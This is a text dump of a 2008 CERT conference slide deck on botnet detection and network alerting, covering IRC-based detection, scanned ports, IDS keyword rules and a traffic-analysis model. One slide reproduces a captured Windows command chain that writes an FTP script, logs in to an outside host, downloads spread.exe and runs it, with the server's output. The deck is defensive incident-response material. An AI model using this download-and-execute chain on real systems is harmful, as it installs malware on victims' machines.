210 likes | 380 Views
Botnet Detection and Network Security Alert. Tao JING jingtao @cstnet.cn CSTCERT,CNIC (+86)-010-58812898 CANS 2008 Indiana University 2008-10-21. Agenda. About CSTCERT About Botnet Network Security Alert Future work. CSTCERT Overview.
E N D
Botnet Detection and Network Security Alert Tao JING jingtao@cstnet.cn CSTCERT,CNIC (+86)-010-58812898 CANS 2008 Indiana University 2008-10-21 China Science & Technology Network Computer Emergency Response Team
Agenda • About CSTCERT • About Botnet • Network Security Alert • Future work China Science & Technology Network Computer Emergency Response Team
CSTCERT Overview • Founded in 2002 , CSTCERT(China Science and Technology Network Computer Emergency Response Team) • CSTCERT is supervised by CSTNET. • Services: • Incidents handling, include: attack ,complaints , abnormal traffic detect and other related security incidents • research and development : • Emergency Response • Security training : http://cert.cstnet.cn :+86-010-58812935 : cert@cstnet.cn China Science & Technology Network Computer Emergency Response Team
Our work • 2007.9 -2008.9 ,we have handled 266 security events. • security incidents:205 • security complaints :61 China Science & Technology Network Computer Emergency Response Team
Security status is very serious!-why? • You can become a hacker very easily! • Know a little knowledge • Search hacker method from Internet • Many people share their hacker tools • If you want to pay some money, someone will teach you about hacker-tech. China Science & Technology Network Computer Emergency Response Team
About Botnet • A botnet is a collection of computers, connected to the internet, that interact to accomplish some distributed task. • Botnet typically refers to such a system designed and used for illegal purposes. • The compromised machines are referred to as drones or zombies, the malicious software running on them as 'bot'. From: www.shadowserver.org China Science & Technology Network Computer Emergency Response Team
Botnet can cause ? and 。。。 China Science & Technology Network Computer Emergency Response Team
How can we find Botnet? • Active way: • Network protocol analysis • IRC () • monitor some special TCP port(135/139/445/1433/22/2967……) • Check C&C(Command and Control Center) server address update from internet • http://www.cyber-ta.org/ • http://www.shadowserver.org • Passive way: • honeypot China Science & Technology Network Computer Emergency Response Team
China Science & Technology Network Computer Emergency Response Team
Main Character of Botnet • IRC message • Port scan:advscan, asc… • File download:download • Others: ping/pong,join,mode… • scan tcp port:135/139/445/1433/22/2967 • Vulnerability that botnet always exploit • Weak password (ssh/MS-SQL/windows) • Overflow vulnerability(MS-SQL/windows/software) China Science & Technology Network Computer Emergency Response Team
the host was controled by this method-1 Sometimes-use scan control command China Science & Technology Network Computer Emergency Response Team
the host was controled by this method-2 Sometimes-install malware China Science & Technology Network Computer Emergency Response Team
China Science & Technology Network Computer Emergency Response Team
C:\Documents and Settings\jackie>cmd /c echo open spreadem.nowslate1703.info 21 >appmr.dll &echo user spread baby >>appmr.dll &echo binary >>appmr.dll &echo get >>appmr.dll &echo spread.exe >>appmr.dll &echo spread.exe >>appmr.dll &echo bye >>appmr.dll &ftp.exe -n -s:appmr.dll &del appmr.dll &spread.exe ftp> open spreadem.nowslate1703.info 21 Connected to spreadem.nowslate1703.info. 220---------- Welcome to Pure-FTPd [TLS] ---------- 220-You are user number 73 of 200 allowed. 220-Local time is now 00:15. Server port: 21. 220-IPv6 connections are also welcome on this server. 220 You will be disconnected after 2 minutes of inactivity. ftp> user spread baby 331 User spread OK. Password required 230-User spread has group access to: spread 230 OK. Current restricted directory is / ftp> binary 200 TYPE is now 8-bit binary ftp> get Remote file spread.exe Local file spread.exe 200 PORT command successful 150-Connecting to port 1555 150 83.1 kbytes to download 226-File successfully transferred 226 0.750 seconds (measured here), 110.70 Kbytes per second ftp: 85057 bytes received in 1.50Seconds 56.70Kbytes/sec. ftp> bye 221-Goodbye. You uploaded 0 and downloaded 84 kbytes. 221 Logout. C:\Documents and Settings\jackie> China Science & Technology Network Computer Emergency Response Team
Network security alert -IDS/IPS rule • For port scan:Use some IRC message word:asc/advscan • for network comunication with IRC: Ping/Pong,JOIN,PRIVMSG …… China Science & Technology Network Computer Emergency Response Team
Rules for IDS China Science & Technology Network Computer Emergency Response Team
Network security alert -Network traffic data analysis • We can build a simple mathematics model to describe Network Traffic data by Numerical Analysis method (NTNA model) China Science & Technology Network Computer Emergency Response Team
Data of tcp 1433 scan Count_1 Count_2 。。。 Count_n Dst_ipsum_1 Dst_ipnsum_2 。。。 Dst_ipsum_n Src_ip1 Src_ip2 。。。 Src_ipn Data of tcp 22 scan 。。。。。。 Data of other port scan China Science & Technology Network Computer Emergency Response Team
NTNA model in practice China Science & Technology Network Computer Emergency Response Team
Future work • Botnet research • Monitoring and countermeasure for large-scale network worm • Some improvement for the NTNA model • accuracy amendment • Extension to larger scale network traffic data (netflow) • Data mining China Science & Technology Network Computer Emergency Response Team
Thank you! jingtao@cstnet.cn (+86)-010-58812898 China Science & Technology Network Computer Emergency Response Team